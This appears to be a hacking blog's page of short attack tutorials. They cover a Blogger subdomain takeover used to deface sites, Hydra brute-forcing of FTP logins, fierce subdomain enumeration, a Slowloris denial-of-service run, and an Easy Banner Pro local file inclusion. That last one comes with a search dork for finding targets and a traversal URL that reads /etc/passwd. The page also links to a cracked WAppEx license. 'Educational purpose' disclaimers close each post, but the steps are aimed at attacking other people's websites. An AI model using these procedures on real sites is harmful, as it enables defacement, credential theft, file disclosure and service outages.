Showing posts with label websitehacking. Show all posts

Blogger 0day exploit by Shadow008 Detailed Tutorial

Hello readers !! if you are attached with hacking from long a period of time then you must be knowing about Shadow008 (From Pakistan). He just posted a 0day exploit on Blogger DNS Vulnerability.

In this tutorial we will learn how use that 0day exploit in detailed.



Requirements:-

  • You must know how to bruteforce sub-domains. If you don't know, learn it from here.

  • Dorks to find blogger website or any site pointing to Google server.



So lets begin :-

  • Firstly find a blogger website using Google Dorks :- filetype:html intext:powered by blogger inurl:/2012/

  • After finding a blogger website, bruteforce the sub-domains.

  • If any of the sub-domains is vulnerable to this exploit, then it will look as shown in the image :-


Blogger 0day exploit by Shadow008 Detailed Tutorial



  • Then make a account on blogger, if already have one then create a new blog and give the name and url whatever you want.

  • After making a new blog, goto Settings >> Publishing >> Add a Custom Domain >> Switch to Advance Setting.

  • Then put the vulnerable sub-domain there and save it.


Blogger 0day exploit by Shadow008 Detailed Tutorial



  • Then clear all your browser cache, and open the http://blogger.cm/home/ directory.

  • Select your blog, which you have created.

  • Goto Template >> Revert To Classic Template.

  • In Edit Template HTML  box, paste your deface page code.

  • Now open the sub-domain again, there must be your deface page :D .


This is only for educational purpose. We are not responsible for any type of illegal activity done by you.
Read more

Web Application Exploiter (WAppEx)- Hacking Tool

WAppEx is an integrated platform for performing penetration testing and exploiting of web applications on Windows or Linux. It can automatically check for all type of security vulnerabilities in the given target and then let you to run various payloads to exploit and take advantages of the vulnerability.



Click Here to Download 



To Register it :-

  • Open it first then in Name type ITSecTeam and then download the license file from here.

  • Click on Register button.

  • Enjoy
Read more

Brute Force FTP Accounts with Hydra (GUI)

Introduction

  THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services like :-



  • afp

  • cisco

  • cisco-enable

  • cvs

  • firebird

  • ftp

  • http-get

  • http-head

  • http-proxy

  • https-get

  • https-head

  • https-form-get

  • https-form-post

  • icq

  • imap

  • imap-ntlm

  • ldap2

  • ldap3

  • mssql

  • mysql

  • telnet


Our Objectives



  •  In this tutorial we will learn how to use Hydra to crack ftp password.


Requirements



  • Backtrack

  • Strong Wordlist or you can make your own wordlist by using cupp tool.
You Can also Download Hydra From here: Click Here

Procedure

How To Open it :-




  • Goto Backtrack >> Privilege Escalation >> Password Attacks >> Online Attacks >> hydra-gtk.



Brute Force FTP Passwords with Hydra (GUI)



How to do it :-



  • Type the ip of targeted website in the single target box and select ftp in protocol box.



Brute Force FTP Passwords with Hydra (GUI)






  • Now open the Passwords tab, put username of that ftp account which you wants to bruteforce and in password section, select password list  then click on the blank box. After that a new window will be open, from there select the path of your wordlist. You can download a good wordlist from here.



Brute Force FTP Passwords with Hydra (GUI)





  • Now goto under Start tab and then click on start. Then it will start brute forcing.


Brute Force FTP Passwords with Hydra (GUI)





  • If there is a password in wordlist of a particular ftp account. Then it will be bruteforced successfully.



Brute Force FTP Passwords with Hydra (GUI)


Conclusion

At the end of this tutorial, we have learned the simple usage of  Hydra and also we have learned how to crack ftp passwords and how it works.


Note:- This is only for educational purpose , we are not responsible for any type of illegal activity done by you.
Read more

Google Hacking for Penetration Testers by Johnny Long

Google Hacking for Penetration Testers By Johnny Long
Google Hacking for Penetration Testers By Johnny Long



Google, the most popular search engine worldwide, provides web surfers with an easy-to-use guide to the Internet, with web and image searches, language translation, and a range of features that make web navigation simple enough for even the novice user. What many users dont realize is that the deceptively simple components that make Google so easy to use are the same features that generously unlock security flaws for the malicious hacker. Vulnerabilities in website security can be discovered through Google hacking, techniques applied to the search engine by computer criminals, identity thieves, and even terrorists to uncover secure information. This book beats Google hackers to the punch, equipping web administrators with penetration testing applications to ensure their site is invulnerable to a hackers search. Penetration Testing with Google Hacks explores the explosive growth of a technique known as "Google Hacking." When the modern security landscape includes such heady topics as "blind SQL injection" and "integer overflows," it's refreshing to see such a deceptively simple tool bent to achieve such amazing results; this is hacking in the purest sense of the word. Readers will learn how to torque Google to detect SQL injection points and login portals, execute port scans and CGI scans, fingerprint web servers, locate incredible information caches such as firewall and IDS logs, password databases, SQL dumps and much more - all without sending a single packet to the target! Borrowing the techniques pioneered by malicious "Google hackers," this talk aims to show security practitioners how to properly protect clients from this often overlooked and dangerous form of information leakage. *First book about Google targeting IT professionals and security leaks through web browsing. *Author Johnny Long, the authority on Google hacking, will be speaking about "Google Hacking" at the Black Hat 2004 Briefing. His presentation on penetrating security flaws with Google is expected to create a lot of buzz and exposure for the topic. *Johnny Long's Web site hosts the largest repository of Google security exposures and is the most popular destination for security professionals who want to learn about the dark side of Google.



Download it from here

pass= ihos
size=4.9 mb


DEFCON 13: Google Hacking for Penetration Testers

Read more

SubDomain Enumeration With fierce Tool-Backtrack 5 R3

Introduction


Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.  It's really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately.  It is meant specifically to locate likely targets both inside and outside a corporate network.  Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware.


Procedure Of Using This Tool


How To Open it :-





    • To open it goto Backtrack >> Information Gathering >> Network Analysis >> DNS Analysis >> fierce. Or you can open it through Terminal, type "cd /pentest/enumeration/dns/fierce". Hit Enter.



 

Sub-Domain Enumeration With fierce Tool-Backtrack 5 R3


Simple Usage:-




  • To use this tool we have to use this command, ./fierce.pl -dns <domain>


 

Sub-Domain Enumeration With fierce Tool-Backtrack 5 R3


What Happen If Zone Transfer Falied :-




  • If Zone Transfer Fails, it will automatically start brute-forcing the Domain.


SubDomain Enumeration With fierce Tool-Backtrack 5 R3

 

 

Usage With Options:-

  • To see the available options, type ./fierce.pl -dns <domain name> <option>. One example ./fierce.pl -dns xyz.com -wordlist <wordlist path>


 

SubDomain Enumeration With fierce Tool-Backtrack 5 R3


Conclusion :-


In this tutorial we have learn how to use enumerate sub domains using fierce tool. Feel free to ask if you have any question.


This tutorial is only for educational purpose. Im not responsible for any type of illegal activity done by you.

Read more

Easy Banner Pro Local File Inclusion-Website Hacking

Google Dork:- inurl:"/easybannerpro/index.php" 

Url will be something like this:-

http://www.example.com/easybannerpro/index.php


Then add this in url ?page=../../../../../../../../../../etc/passwd.

Then the url will look like this http://www.example.com/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd



Easy Banner Pro Local File Inclusion-Website Hacking


This is only for educational purpose, we are not responsible for any illegal activity done by you.
Read more

How to DDos a website with Slowloris - Backtrack 5 R2

Hello friends!! Today I'm gonna tell you how to DDos a website with Slowloris.

Slowloris is a piece of Perl script written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.

So now lets come to our tutorial:-

Requirements:-
  • Slowloris Perl script, you can get it from here and save it as slowloris.pl

Steps to follow:- 


  • Open your Terminal and then goto the directory where you have saved Slowloris.pl script.
  • Then type chmod 755 slowloris.pl.
  • Hit Enter


  • To see, how this script works type ./slowloris.pl 
  • Hit Enter
  • To DDos a website type perl ./slowloris.pl -dns

  • Hit Enter
  • After that, slowloris.pl will start sending packets automatically.


  • Now you have successfully done :)

    Note:- All sites are not dos able, Ex: Blogger :D

    This is only for educational purpose, im not responsible for any type of illegal activity done by you.
    Read more